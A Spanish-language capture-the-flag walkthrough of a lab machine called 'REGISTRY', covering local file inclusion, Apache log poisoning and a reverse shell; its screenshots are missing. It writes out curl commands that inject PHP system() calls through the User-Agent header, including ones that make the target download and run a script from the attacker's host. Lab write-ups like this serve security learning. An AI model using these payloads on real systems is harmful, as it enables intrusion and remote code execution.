Máquina REGISTRY
Hacemos un escaneo con nmap:
Y esta es la página web:
Si hacemos clic en sign up, vemos que se nos cambia la URL donde se llama a un fichero llamado default.php, lo que nos da una pista de un posible local file inclusion:
Hay una herramienta para automatizar ataques de local file inclusion en el siguiente repositorio:
https://github.com/kvlx-alt/LFI-Scanner
La bajamos y probamos:
Y nos pide la url, donde la pegaremos justo en el momento antes que cargue el default.php:
Y vemos que nos pide un diccionario para hacer ataques de fuerza bruta, por lo que nos bajamos uno de github:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
Una vez bajado, lo cargamos en la herramienta y nos encuentra el path vulnerable:
http://192.168.0.42/index.php?page=/etc/passwd
Lo pegamos en la web y vemos que funciona:
Lo interesante es que una vez pudiendo ver archivos del sistema, podemos ver también el archivo access.log de apache, por lo que es posible que estemos ante un log poisonning:
http://192.168.0.42/index.php?page=/var/log/apache2/access.log
Ejecutamos un comando de forma remota con curl:
curl -s -X GET 'http://192.168.0.42/' -H "User-Agent: <?php system('whoami'); ?>"
Y vemos que se ejecutó correctamente en la máquina víctima:
Por lo que ahora ingresamos código para enviarnos una reverse shell, de tal forma que creamos el script con el payload:
Nos montamos un servidor http con python compartiendo este script:
Y ejecutamos los siguientes comandos:
curl -s -X GET 'http://192.168.0.42' -H "User-Agent: <?php system('wget http://10.8.100.91/pwned.sh'); ?>" curl -s -X GET 'http://192.168.0.42' -H "User-Agent: <?php system('chmod 777 pwned.sh'); ?>" curl -s -X GET 'http://192.168.0.42' -H "User-Agent: <?php system('bash pwned.sh'); ?>"
Y recibimos la reverse shell:
Una vez dentro, vemos que tenemos 3 carpetas pero no tenemos permiso para acceder a ninguna de ellas:














